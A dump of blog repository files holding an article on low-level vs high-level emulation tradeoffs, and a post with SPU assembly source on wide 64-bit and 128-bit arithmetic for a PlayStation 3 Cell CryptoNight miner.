reimplement the hardware on LLE, reimplement the kernel on HLE), so that the layer(s) above it can **execute** successfully. 
This results in two costs that you have to balance: "*development time*" and "*execution time*". Let me explain why this balance is important with a few extreme examples of poor balances: 32 | 33 | - *Too high-level*: What would happen if you'd put that barrier between the game engine and the actual game? This idea used to be not so crazy, as it's what https://www.scummvm.org/ does. However, game engines these days are insanely complex with several million lines of code, it would take you centuries as a single developer to write an emulator that operated at such high levels. The "*development time*" would be massive, but the "*execution time*" (i.e. the emulator's performance) would be pretty good, since all the complex tasks have been reimplemented natively for the host system. 34 | 35 | - *Too low-level*: What would happen if you wrote a transistor-level emulator? Again, not so crazy for old platforms, see the http://www.visual6502.org/ project. Assuming you had the equipment to decap a chip, a scanning electron microscope and fancy computer vision algorithms, you could easily generate code that simulates your target microprocessor, so little "*development time*", however, the "*execution time*" would be insanely high caused by simulating billions of transistors. 36 | 37 | As you see, the rule of thumb is: higher-level incurs larger development costs, and lower-level incurs larger execution costs. But this is not always the case, and it has frequently led to misconceptions among the end-users. One of them is wrongly estimating the performance of different emulator paradigms. 38 | 39 | ## Performance myths 40 | 41 | Let's debunk some of those performance myths: Assume you want to emulate some machine, and you are learning about its hardware/software to balance "*development time*" vs "*execution time*" and pick the right strategy. How do you estimate those costs, especially "*execution time*", aside from the naive rule of thumb above? 
Estimating how fast something will run isn't just about which levels of abstraction you are targeting. The resulting performance will depend on how many "*concepts*" from your *guest machine* (i.e. the thing you're trying to emulate), can be mapped into your *host machine* (the thing that will run the emulator). 42 | 43 | To give you an example, one such "*concept*" is the MMU. To explain it briefly (and slightly wrong/oversimplified but for the sake of the explanation will do), the MMU is the thing that allows each application to have access to a slice of RAM by mapping addresses of a "*virtual address space*" (an imaginary arrangement of memory) to a "*physical address space*" (the actual RAM). Every time the application accesses the memory with some CPU instruction, behind the scenes the MMU will translate the virtual address given by the application into a physical one. 44 | 45 | - HLE emulators typically don't worry about the guest MMU since guest applications only use virtual addressing and whenever they try to contact the guest kernel (e.g. to allocate more memory), the emulator takes control and very generously gives the guest application a chunk of its own host virtual memory. So everyone's happy. 46 | 47 | - LLE emulators have to worry about both the guest virtual memory and the guest physical memory. Many of them allocate guest physical memory during initialization, and do the "*guest virtual memory* to *guest physical memory*" translation by emulating the MMU in software. That causes every memory access (1 instruction) to invoke some specialized code that does the translation+access (100's of instructions). Of course, some translations can be cached, but the performance hit is still high. Remember that for every guest access, you have to traverse 4 layers: 48 | 49 | 1. Guest virtual memory 50 | 2. Guest physical memory 51 | 3. Host virtual memory 52 | 4. 
Host physical memory 53 | 54 | However in some scenarios (this depends on MMU quirks, page sizes, etc.), you could have use your host computer's own MMU to handle the accesses of the guest applications directly. One way of accomplishing this is running the guest software in a VM and having an hypervisor letting it directly access a slice of the host computer's physical RAM directly. This would remove the need for expensive software-based address translation and result in large performance gains. 55 | 56 | ## Conclusion 57 | 58 | By making a better use of the host machine's resources, in the MMU and many other different areas, you can make even low-level emulation happen with an acceptable performance. It's not a surprise that Sony used this strategy to emulate the PS2 on the PS3, and Microsoft to emulate the Xbox on Xbox 360 [[1]](http://michaelbrundage.com/project/xbox-360-emulator/) and Xbox 360 on Xbox One. This 10x performance slowdown while doing LLE is a myth, resulting from many oversimplifications and/or people that have poorly utilized the host machine's resources. 59 | 60 | Of course, massive slowdowns can still happen: with really heterogeneous architectures, some concepts can be hard to map into each other and you might have to resort to software emulation incurring in 10x and 100x performance penalties, but this isn't always necessarily the case. There are no magic "*performance penalty*" numbers, everything has to be considered in a case-by-case basis, and the only way of estimating what that would be is getting to know both guest and host systems really in detail. 61 | -------------------------------------------------------------------------------- /posts/2018-04-18-lle-vs-hle/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | LLE vs HLE and their tradeoffs 8 | 9 | 10 | 11 | 51 | 52 | 53 |
54 | 61 | < Other articles 62 |
63 |
64 |

LLE vs HLE and their tradeoffs

65 |

66 | AuthorAlexandro Sanchez 69 | Date2018-04-18 72 |

73 |

Introduction

74 |

This article aims to give an intuitive understanding for the terms "Low-Level Emulation" (LLE) and "High-Level Emulation" (HLE) often heard in the emulation scene, their differences and tradeoffs in development/performance costs, and how developers choose one paradigm or the other.

75 |

Machines are made of several layers of abstraction, each of them relying on the layer below to perform some particular task. In the context of gaming consoles, you might consider these layers (ordered from higher to lower level):

76 | 83 |

That's where these "low-level" or "high-level" terms come from. Something is more "high-level" when it has more layers of abstraction below it, and it's more "low-level" when it has more layers of abstraction above it. With so many layers, the terms "low" and "high" can become quite subjective (developers can't even agree about whether some emulators are HLE or LLE). Furthermore, you could go even below the hardware level and start thinking about transistors, atoms, etc. as even deeper layers of abstraction. Similarly, there are also even higher levels like the game scripts that are sometimes used to handle events/dialogues in a game. Of course, for most emulators, these layers are either too low, or too high. Why?

84 |

Emulation paradigms

85 |

Let's tackle this question after giving an intuitive notion of what emulation is. Emulating a system is all about putting a "barrier" between two adjacent layers of abstraction. For instance:

86 | 90 |

Back to the original question, why do emulators pick the barriers always at these two "hot spots", i.e. LLE (hardware and kernel) and HLE (kernel and userland)?

91 |

When you place this "emulation" barrier between two layers, you have to reimplement the layer below (i.e. reimplement the hardware on LLE, reimplement the kernel on HLE), so that the layer(s) above it can execute successfully. This results in two costs that you have to balance: "development time" and "execution time". Let me explain why this balance is important with a few extreme examples of poor balances:

92 | 100 |

As you see, the rule of thumb is: higher-level incurs larger development costs, and lower-level incurs larger execution costs. But this is not always the case, and it has frequently led to misconceptions among the end-users. One of them is wrongly estimating the performance of different emulator paradigms.

101 |

Performance myths

102 |

Let's debunk some of those performance myths: Assume you want to emulate some machine, and you are learning about its hardware/software to balance "development time" vs "execution time" and pick the right strategy. How do you estimate those costs, especially "execution time", aside from the naive rule of thumb above? Estimating how fast something will run isn't just about which levels of abstraction you are targeting. The resulting performance will depend on how many "concepts" from your guest machine (i.e. the thing you're trying to emulate), can be mapped into your host machine (the thing that will run the emulator).

103 |

To give you an example, one such "concept" is the MMU. To explain it briefly (and slightly wrong/oversimplified but for the sake of the explanation will do), the MMU is the thing that allows each application to have access to a slice of RAM by mapping addresses of a "virtual address space" (an imaginary arrangement of memory) to a "physical address space" (the actual RAM). Every time the application accesses the memory with some CPU instruction, behind the scenes the MMU will translate the virtual address given by the application into a physical one.

104 | 118 |

However, in some scenarios (this depends on MMU quirks, page sizes, etc.), you could use your host computer's own MMU to handle the accesses of the guest applications directly. One way of accomplishing this is running the guest software in a VM and having a hypervisor let it access a slice of the host computer's physical RAM directly. This would remove the need for expensive software-based address translation and result in large performance gains.

119 |

Conclusion

120 |

By making a better use of the host machine's resources, in the MMU and many other different areas, you can make even low-level emulation happen with an acceptable performance. It's not a surprise that Sony used this strategy to emulate the PS2 on the PS3, and Microsoft to emulate the Xbox on Xbox 360 [1] and Xbox 360 on Xbox One. This 10x performance slowdown while doing LLE is a myth, resulting from many oversimplifications and/or people that have poorly utilized the host machine's resources.

121 |

Of course, massive slowdowns can still happen: with really heterogeneous architectures, some concepts can be hard to map into each other and you might have to resort to software emulation incurring 10x and 100x performance penalties, but this isn't always necessarily the case. There are no magic "performance penalty" numbers, everything has to be considered on a case-by-case basis, and the only way of estimating what that would be is getting to know both guest and host systems in great detail.

122 |
123 |
124 | 130 | 131 | 132 | -------------------------------------------------------------------------------- /posts/2019-02-16-cell-miner-alu/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | date: 2019-02-16 4 | title: PS3/Cell Cryptomining: Wide arithmetic on SPUs 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | [TOC] 9 | 10 | ## Background 11 | 12 | Some time ago, I implemented a cryptocurrency miner for the [Cell B.E. Architecture](https://en.wikipedia.org/wiki/Cell_(microprocessor)) used in the PlayStation 3 and certain servers. Specifically, the goal was implementing PoW-algorithms based on CryptoNight, described by the [CryptoNote](https://cryptonote.org/standards/) standards and used by [Monero/XMR](https://www.getmonero.org/). 13 | 14 | At their current valuation, no such cryptocurrency can be profitably mined using consumer PlayStation 3 hardware and this situation is not expected to revert in the short/mid term. Furthermore, possible long-term changes are irrelevant, as newer hardware will increasingly outperform the Cell B.E., raising mining difficulty and the profitability threshold ever further. 15 | 16 | Consequently, I'm releasing the source code of this miner along with blog articles on technical aspects of Cell B.E. that might be of general interest (even if just for historical reasons): 17 | 18 | 1. [PS3/Cell Cryptomining: Wide arithmetic on SPUs](.). 19 | 2. [PS3/Cell Cryptomining: High-performance AES on SPUs](#). (TBD.) 20 | 3. [PS3/Cell Cryptomining: Memory Flow Controller](#). (TBD.) 21 | 22 | This first post describes the implementation of wide arithmetic operations on "narrow" ALUs present in the SPUs. 23 | 24 | ## Multiplication (64-bit) 25 | 26 | CryptoNight requires a 64-bit x 64-bit integer multiplication that results in a 128-bit integer. 
Implementing such operation on the SPUs is challenging as the largest multiplication granularity available is 16-bit x 16-bit to 32-bit due to the word-size limitations of the SPU ALUs. The following algorithm describes how to emulate such multiplication. 27 | 28 | ### Theory 29 | 30 | Consider the `a` and `b` input registers, the 64-bit LHS and RHS of the multiplication operation are composed of the half-words [a0, a1, a2, a3] and [b0, b1, b2, b3], respectively. 31 | 32 | ``` 33 | 0 16 32 48 64 80 96 112 128 34 | +--------+--------+--------+--------+--------+--------+--------+--------+ 35 | a: | a0 | a1 | a2 | a3 | XX | XX | XX | XX | 36 | +--------+--------+--------+--------+--------+--------+--------+--------+ 37 | +--------+--------+--------+--------+--------+--------+--------+--------+ 38 | b: | b0 | b1 | b2 | b3 | XX | XX | XX | XX | 39 | +--------+--------+--------+--------+--------+--------+--------+--------+ 40 | MSB LSB 41 | ``` 42 | 43 | This is equivalent to the following representation: 44 | 45 | ``` 46 | LHS := a3 + (a2 * 2^16) + (a1 * 2^32) + (a0 * 2^48) 47 | RHS := b3 + (b2 * 2^16) + (b1 * 2^32) + (b0 * 2^48) 48 | ``` 49 | 50 | Applying the distributive property, the multiplication of both values should be equivalent to: 51 | 52 | ``` 53 | LHS * RHS = (a3 + (a2 * 2^16) + (a1 * 2^32) + (a0 * 2^48)) * 54 | (b3 + (b2 * 2^16) + (b1 * 2^32) + (b0 * 2^48)) 55 | = (a3*b3*2^00) + (a3*b2*2^16) + (a3*b1*2^32) + (a3*b0*2^48) + 56 | (a2*b3*2^16) + (a2*b2*2^32) + (a2*b1*2^48) + (a2*b0*2^64) + 57 | (a1*b3*2^32) + (a1*b2*2^48) + (a1*b1*2^64) + (a1*b0*2^80) + 58 | (a0*b3*2^48) + (a0*b2*2^64) + (a0*b1*2^80) + (a0*b0*2^96) 59 | ``` 60 | 61 | Our implementation will perform these 16 multiplications of 16-bit words (`aX*bY`), shift the results (`*2^N`), and add everything together using 128-bit additions. 
62 | 63 | ### Implementation 64 | 65 | First of all, let's recap the available multiplication operations in SPU (quoted from the *Synergistic Processor Unit Instruction Set Architecture v1.2*): 66 | 67 | > * `mpy rt,ra,rb`: **Multiply**. The signed 16 least significant bits of the corresponding word elements of registers `ra` and `rb` are multiplied, and the 32-bit products are placed in the corresponding word elements of register `rt`. 68 | > * `mpyhh rt,ra,rb`: **Multiply high high**. The signed 16 most significant bits of the word elements of registers `ra` and `rb` are multiplied, and the 32-bit products are placed in the corresponding word elements of register `rt`. 69 | 70 | When necessary, unsigned variants are available by adding an `u` suffix to the instruction name. 71 | 72 | #### 1. Multiplying half-words 73 | 74 | The distributive unfolding of the multiplication described earlier involves multiplying 16 half-words pairs into 16 words. Each multiplication instruction yields a maximum of 4 32-bit words, but since only 64-bits are used in `a` and `b`, only 2 are useful. 75 | 76 | To minimize the number of multiplications, we can duplicate/shuffle half-words to the unused 64-bits of the quad-word via `shufb` as follows (this step can also be used to switch endianness, if necessary): 77 | 78 | ``` 79 | 0 16 32 48 64 80 96 112 128 80 | +--------+--------+--------+--------+--------+--------+--------+--------+ 81 | a: | a0 | a1 | a2 | a3 | a2 | a3 | a0 | a1 | 82 | +--------+--------+--------+--------+--------+--------+--------+--------+ 83 | +--------+--------+--------+--------+--------+--------+--------+--------+ 84 | b: | b0 | b1 | b2 | b3 | b0 | b1 | b2 | b3 | 85 | +--------+--------+--------+--------+--------+--------+--------+--------+ 86 | MSB LSB 87 | ``` 88 | 89 | Additionally, we left-shift by 16 both `a`, `b` into `c`, `d` respectively, to do high-low multiplications (similarly to the `mpyh` instruction but without post-shifting). 
It does not matter whether the least significant half-word is zeroed. The result is: 90 | 91 | ``` 92 | 0 16 32 48 64 80 96 112 128 93 | +--------+--------+--------+--------+--------+--------+--------+--------+ 94 | c: | a1 | (a2) | a3 | (a2) | a3 | (a0) | a1 | (00) | 95 | +--------+--------+--------+--------+--------+--------+--------+--------+ 96 | +--------+--------+--------+--------+--------+--------+--------+--------+ 97 | d: | b1 | (b2) | b3 | (b0) | b1 | (b2) | b3 | (00) | 98 | +--------+--------+--------+--------+--------+--------+--------+--------+ 99 | MSB LSB 100 | ``` 101 | 102 | This way we can generate all necessary multiplications as follows: 103 | 104 | ``` 105 | mpy t0, a, b 106 | mpyhh t1, a, d 107 | mpyhh t2, b, c 108 | mpyhh t3, a, b 109 | ``` 110 | 111 | Leaving us with the following results: 112 | 113 | ``` 114 | 0 16 32 48 64 80 96 112 128 115 | +--------+--------+--------+--------+--------+--------+--------+--------+ 116 | t0 | a1 * b1 | a3 * b3 | a3 * b1 | a1 * b3 | 117 | +--------+--------+--------+--------+--------+--------+--------+--------+ 118 | +--------+--------+--------+--------+--------+--------+--------+--------+ 119 | t1 | a0 * b1 | a2 * b3 | a2 * b1 | a0 * b3 | 120 | +--------+--------+--------+--------+--------+--------+--------+--------+ 121 | +--------+--------+--------+--------+--------+--------+--------+--------+ 122 | t2 | b0 * a1 | b2 * a3 | b0 * a3 | b2 * a1 | 123 | +--------+--------+--------+--------+--------+--------+--------+--------+ 124 | +--------+--------+--------+--------+--------+--------+--------+--------+ 125 | t3 | a0 * b0 | a2 * b2 | a2 * b0 | a0 * b2 | 126 | +--------+--------+--------+--------+--------+--------+--------+--------+ 127 | MSB LSB 128 | ``` 129 | 130 | #### 2. Shuffling half-words 131 | 132 | Before adding each of these 16 words, we need to multiply each by the corresponding power of 2 computed previously (i.e. shifting by a certain amount in bits). 
These constants are: 133 | 134 | ``` 135 | 0 16 32 48 64 80 96 112 128 136 | +--------+--------+--------+--------+--------+--------+--------+--------+ 137 | t0 | t00 64 | t01 0 | t02 32 | t03 32 | 138 | +--------+--------+--------+--------+--------+--------+--------+--------+ 139 | +--------+--------+--------+--------+--------+--------+--------+--------+ 140 | t1 | t10 80 | t11 16 | t12 48 | t13 48 | 141 | +--------+--------+--------+--------+--------+--------+--------+--------+ 142 | +--------+--------+--------+--------+--------+--------+--------+--------+ 143 | t2 | t20 80 | t21 16 | t22 48 | t23 48 | 144 | +--------+--------+--------+--------+--------+--------+--------+--------+ 145 | +--------+--------+--------+--------+--------+--------+--------+--------+ 146 | t3 | t30 96 | t31 32 | t32 64 | t33 64 | 147 | +--------+--------+--------+--------+--------+--------+--------+--------+ 148 | MSB LSB 149 | ``` 150 | 151 | We need to move these words into their proper locations (note that some words like `t02` or `t30` are already well placed). Using scratch registers is necessary, since working directly on {t0, t1, t2, t3} would cause bits to get lost due to overlaps. Doing this naively would involve using 16 scratch registers, i.e. 16 128-bit integers to be added later on. 
152 | 153 | However, by shuffling bytes via `shufb` we can bring this down to only 7 scratch registers: 154 | 155 | ``` 156 | 128 112 96 80 64 48 32 16 0 157 | +--------+--------+--------+--------+--------+--------+--------+--------+ 158 | v0 | | ##### t00 ##### | ##### t02 ##### | ##### t01 ##### | 159 | +--------+--------+--------+--------+--------+--------+--------+--------+ 160 | +--------+--------+--------+--------+--------+--------+--------+--------+ 161 | v1 | ##### t30 ##### | ##### t32 ##### | ##### t31 ##### | | 162 | +--------+--------+--------+--------+--------+--------+--------+--------+ 163 | +--------+--------+--------+--------+--------+--------+--------+--------+ 164 | v2 | | ##### t33 ##### | ##### t03 ##### | | 165 | +--------+--------+--------+--------+--------+--------+--------+--------+ 166 | +--------+--------+--------+--------+--------+--------+--------+--------+ 167 | v3 | | ##### t10 ##### | ##### t12 ##### | ##### t11 ##### | | 168 | +--------+--------+--------+--------+--------+--------+--------+--------+ 169 | +--------+--------+--------+--------+--------+--------+--------+--------+ 170 | v4 | | ##### t20 ##### | ##### t22 ##### | ##### t21 ##### | | 171 | +--------+--------+--------+--------+--------+--------+--------+--------+ 172 | +--------+--------+--------+--------+--------+--------+--------+--------+ 173 | v5 | | ##### t13 ##### | | 174 | +--------+--------+--------+--------+--------+--------+--------+--------+ 175 | +--------+--------+--------+--------+--------+--------+--------+--------+ 176 | v6 | | ##### t23 ##### | | 177 | +--------+--------+--------+--------+--------+--------+--------+--------+ 178 | MSB LSB 179 | ``` 180 | 181 | This is accomplished by the following operations (note that only 5 shuffle masks are necessary): 182 | 183 | ``` 184 | shufb v0, t0, t0, mask_v0 185 | shufb v1, t3, t3, mask_v1 186 | shufb v2, t0, t3, mask_v2 187 | shufb v3, t1, t1, mask_v3_v4 188 | shufb v4, t2, t2, mask_v3_v4 189 | shufb v5, t1, 
t1, mask_v5_v6 190 | shufb v6, t2, t2, mask_v5_v6 191 | ``` 192 | 193 | #### 3. Adding results 194 | 195 | The final step is adding the 7 resulting 128-bit words {v0, ..., v6} as described by the algorithm "*Addition (128-bit)*". Let this algorithm be implemented by the macro `add_128(output, lhs, rhs)`. The final result `r` of the multiplication algorithm is computed as follows: 196 | 197 | ``` 198 | add_128 t0, v0, v1 199 | add_128 t1, v2, v3 200 | add_128 t2, v4, v5 201 | add_128 t0, t0, t1 202 | add_128 t0, t0, t2 203 | add_128 r, t0, v6 204 | ``` 205 | 206 | As a final step, one might shuffle bytes again to match the desired endianness. 207 | 208 | ## Addition (128-bit) 209 | 210 | During the implementation of "*Multiplication (64-bit)*" we required a 128-bit + 128-bit integer addition that results in a 128-bit integer, but the largest granularity we can achieve for additions in SPUs is 32-bit. Although our approach here is relatively straightforward, we document it here for the sake of completeness. 211 | 212 | ### Theory 213 | 214 | Consider the input registers `a` and `b`, holding the 128-bit LHS and RHS of the addition operation, and the output register `s`. The inputs are composed of the 32-bit words [a0, a1, a2, a3] and [b0, b1, b2, b3], respectively. 
215 | 216 | ``` 217 | 0 32 64 96 128 218 | +-----------------+-----------------+-----------------+-----------------+ 219 | a: | a0 | a1 | a2 | a3 | 220 | +-----------------+-----------------+-----------------+-----------------+ 221 | +-----------------+-----------------+-----------------+-----------------+ 222 | b: | b0 | b1 | b2 | b3 | 223 | +-----------------+-----------------+-----------------+-----------------+ 224 | MSB LSB 225 | ``` 226 | 227 | This is equivalent to the following representation: 228 | 229 | ``` 230 | LHS := a3 + (a2 * 2^32) + (a1 * 2^64) + (a0 * 2^96) 231 | RHS := b3 + (b2 * 2^32) + (b1 * 2^64) + (b0 * 2^96) 232 | ``` 233 | 234 | Similar to a four-bit adder, we perform the addition component-wise, propagating the carry bit from the LSW to the MSW. We represent this carry bit with the function `overflow` (shortened as `o`), which takes an addition result and outputs 1 if the result is >= 2^32, and 0 otherwise. 235 | 236 | ``` 237 | s3 = a3 + b3 238 | s2 = a2 + b2 + overflow(s3) 239 | s1 = a1 + b1 + overflow(s2) 240 | s0 = a0 + b0 + overflow(s1) 241 | ``` 242 | 243 | ### Implementation 244 | 245 | First of all, let's recap the relevant addition and shift operations available in SPU (quoted from the *Synergistic Processor Unit Instruction Set Architecture v1.2*): 246 | 247 | > * `a rt,ra,rb`: **Add Word**. Each word element of register `ra` is added to the corresponding word element of register `rb`, and the results are placed in the corresponding word elements of register `rt`. 248 | > * `cg rt,ra,rb`: **Carry Generate**. Each word element of register `ra` is added to the corresponding word element of register `rb`. The carry out is placed in the least significant bit of the corresponding word element of register `rt`, and 0 is placed in the remaining bits of `rt`. 249 | > * `shlqbyi rt,ra,value`: **Shift Left Quadword by Bytes Immediate**. The contents of register `ra` are shifted left by the number of bytes specified by the unsigned 5-bit `value`. 
The result is placed in register `rt`. 250 | 251 | #### 1. Basic idea 252 | 253 | By using these instructions, we can perform this addition as follows: 254 | 255 | ``` 256 | +-----------------+-----------------+-----------------+-----------------+ 257 | t0 | t00: a0 + b0 | t01: a1 + b1 | t02: a2 + b2 | t03: a3 + b3 | 258 | +-----------------+-----------------+-----------------+-----------------+ 259 | c0 | c00: o(a1 + b1) | c01: o(a2 + b2) | c02: o(a3 + b3) | | 260 | +-----------------+-----------------+-----------------+-----------------+ 261 | +-----------------+-----------------+-----------------+-----------------+ 262 | t1 | t10: t00+c00 | t11: t01+c01 | t12: t02+c02 | | 263 | +-----------------+-----------------+-----------------+-----------------+ 264 | c1 | c10: o(t01+c01) | c11: o(t02+c02) | | | 265 | +-----------------+-----------------+-----------------+-----------------+ 266 | +-----------------+-----------------+-----------------+-----------------+ 267 | t2 | t20: t10+c10 | t21: t11+c11 | | | 268 | +-----------------+-----------------+-----------------+-----------------+ 269 | c2 | c20: o(t11+c11) | | | | 270 | +-----------------+-----------------+-----------------+-----------------+ 271 | +-----------------+-----------------+-----------------+-----------------+ 272 | t3 | t30: t20+c20 | | | | 273 | +-----------------+-----------------+-----------------+-----------------+ 274 | ``` 275 | 276 | Here, at each iteration *N = {0,1,2,3}*, the temporary variable *tN* contains the 32-bit componentwise addition of *tN-1* and *cN-1*. This can easily be done with the `a` instruction described before. The temporary variables *cN* contain the word-shifted carry bit of said addition, which can be achieved by a combination of the `cg` and `shlqbyi` instructions. 277 | 278 | This process is kickstarted by computing the addition and shifted overflow of the original LHS and RHS components into the *t0* and *c0* registers respectively. 
The final output register `r` can simply be computed as [t30, t21, t12, t03]. 279 | 280 | #### 2. Optimizing register usage 281 | 282 | By analyzing dependencies, you might observe that no more than 3 temporary variables are used at any time. Let's redefine these as `t0`, `t1`, `t2`. Additionally, given that left-shifts are always zero-extended, we can preserve the LSWs as we "carry on" with the computation (no pun intended), saving us from cherry-picking words from different temporaries into `r`. 283 | 284 | The final algorithm would look like this: 285 | 286 | ``` 287 | cg t1, lhs, rhs 288 | a t0, lhs, rhs 289 | shlqbyi t1, t1, 4 290 | cg t2, t0, t1 291 | a t0, t0, t1 292 | shlqbyi t2, t2, 4 293 | cg t1, t0, t2 294 | a t0, t0, t2 295 | shlqbyi t1, t1, 4 296 | a r, t0, t1 297 | ``` 298 | 299 | Note that the same approach is used to perform 64-bit additions, required in CryptoNight's Memory-Hard Loop. 300 | 301 | ## Sources 302 | 303 | You can find the source code for these implementations in: [`arithmetic.s`](arithmetic.s). 304 | -------------------------------------------------------------------------------- /posts/2019-02-16-cell-miner-alu/arithmetic.s: -------------------------------------------------------------------------------- 1 | /** 2 | * SPU high-performance wide arithmetic. 3 | * Author: Alexandro Sanchez Bach . 
4 | */ 5 | 6 | // Registers 7 | 8 | #define alu_reg_se32 $80 9 | #define alu_reg_se64 $81 10 | #define alu_reg_se128 $82 11 | #define alu_reg_mul_lhs $83 12 | #define alu_reg_mul_rhs $84 13 | #define alu_reg_mul_m0 $85 14 | #define alu_reg_mul_m1 $86 15 | #define alu_reg_mul_m2 $87 16 | #define alu_reg_mul_m3 $88 17 | #define alu_reg_mul_m4 $89 18 | #define alu_reg_add_m64 $90 19 | 20 | #define alu_reg_i0 $40 21 | #define alu_reg_i1 $41 22 | #define alu_reg_t0 $42 23 | #define alu_reg_t1 $43 24 | #define alu_reg_t2 $44 25 | #define alu_reg_t3 $45 26 | #define alu_reg_v0 $46 27 | #define alu_reg_v1 $47 28 | #define alu_reg_v2 $48 29 | #define alu_reg_v3 $49 30 | #define alu_reg_v4 $50 31 | #define alu_reg_v5 $51 32 | #define alu_reg_v6 $52 33 | 34 | // Constants 35 | 36 | .align 4 37 | .global alu_endian 38 | alu_endian: 39 | // swap-endian-32 40 | .byte 0x03, 0x02, 0x01, 0x00, 0x07, 0x06, 0x05, 0x04 41 | .byte 0x0B, 0x0A, 0x09, 0x08, 0x0F, 0x0E, 0x0D, 0x0C 42 | // swap-endian-64 43 | .byte 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00 44 | .byte 0x0F, 0x0E, 0x0D, 0x0C, 0x0B, 0x0A, 0x09, 0x08 45 | // swap-endian-128 46 | .byte 0x0F, 0x0E, 0x0D, 0x0C, 0x0B, 0x0A, 0x09, 0x08 47 | .byte 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00 48 | 49 | .align 4 50 | .global alu_wswap 51 | alu_wswap: 52 | // mul_lhs: switch endian, then word swap [0,1,2,3] -> [0,1,1,0] 53 | .byte 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00 54 | .byte 0x03, 0x02, 0x01, 0x00, 0x07, 0x06, 0x05, 0x04 55 | // mul_rhs: switch endian, then word swap [0,1,2,3] -> [0,1,0,1] 56 | .byte 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00 57 | .byte 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00 58 | 59 | .align 4 60 | .global alu_mul64_constants 61 | alu_mul64_constants: 62 | // v0 63 | .byte 0x80, 0x80, 0x80, 0x80, 0x00, 0x01, 0x02, 0x03 64 | .byte 0x08, 0x09, 0x0A, 0x0B, 0x04, 0x05, 0x06, 0x07 65 | // v1 66 | .byte 0x00, 0x01, 0x02, 0x03, 0x08, 0x09, 0x0A, 0x0B 67 | .byte 0x04, 0x05, 0x06, 0x07, 0x80, 
0x80, 0x80, 0x80 68 | // v2 69 | .byte 0x80, 0x80, 0x80, 0x80, 0x1C, 0x1D, 0x1E, 0x1F 70 | .byte 0x0C, 0x0D, 0x0E, 0x0F, 0x80, 0x80, 0x80, 0x80 71 | // v3+v4 72 | .byte 0x80, 0x80, 0x00, 0x01, 0x02, 0x03, 0x08, 0x09 73 | .byte 0x0A, 0x0B, 0x04, 0x05, 0x06, 0x07, 0x80, 0x80 74 | // v5+v6 75 | .byte 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x0C, 0x0D 76 | .byte 0x0E, 0x0F, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80 77 | 78 | .align 4 79 | .global alu_add64_constants 80 | alu_add64_constants: 81 | .byte 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00 82 | .byte 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00 83 | 84 | // Macros 85 | 86 | #define add_64(ret, lhs, rhs) \ 87 | shufb alu_reg_t0, lhs, lhs, alu_reg_se64 ;\ 88 | shufb alu_reg_t1, rhs, rhs, alu_reg_se64 ;\ 89 | cg alu_reg_t2, alu_reg_t0, alu_reg_t1 ;\ 90 | a alu_reg_t0, alu_reg_t0, alu_reg_t1 ;\ 91 | shlqbyi alu_reg_t2, alu_reg_t2, 4 ;\ 92 | and alu_reg_t2, alu_reg_t2, alu_reg_add_m64 ;\ 93 | a alu_reg_t0, alu_reg_t0, alu_reg_t2 ;\ 94 | shufb ret, alu_reg_t0, alu_reg_t0, alu_reg_se64 ; 95 | 96 | #define add_128(ret, lhs, rhs) \ 97 | cg alu_reg_t1, lhs, rhs ;\ 98 | a alu_reg_t0, lhs, rhs ;\ 99 | shlqbyi alu_reg_t1, alu_reg_t1, 4 ;\ 100 | cg alu_reg_t2, alu_reg_t0, alu_reg_t1 ;\ 101 | a alu_reg_t0, alu_reg_t0, alu_reg_t1 ;\ 102 | shlqbyi alu_reg_t2, alu_reg_t2, 4 ;\ 103 | cg alu_reg_t1, alu_reg_t0, alu_reg_t2 ;\ 104 | a alu_reg_t0, alu_reg_t0, alu_reg_t2 ;\ 105 | shlqbyi alu_reg_t1, alu_reg_t1, 4 ;\ 106 | a ret, alu_reg_t0, alu_reg_t1 ; 107 | 108 | #define mul_64(ret, lhs, rhs) \ 109 | shufb alu_reg_i0, lhs, lhs, alu_reg_mul_lhs ;\ 110 | shufb alu_reg_i1, rhs, rhs, alu_reg_mul_rhs ;\ 111 | shli alu_reg_v0, alu_reg_i0, 16 ;\ 112 | shli alu_reg_v1, alu_reg_i1, 16 ;\ 113 | mpyu alu_reg_t0, alu_reg_i0, alu_reg_i1 ;\ 114 | mpyhhu alu_reg_t1, alu_reg_i0, alu_reg_v1 ;\ 115 | mpyhhu alu_reg_t2, alu_reg_i1, alu_reg_v0 ;\ 116 | mpyhhu alu_reg_t3, alu_reg_i0, alu_reg_i1 ;\ 117 | shufb alu_reg_v0, alu_reg_t0, alu_reg_t0, alu_reg_mul_m0 
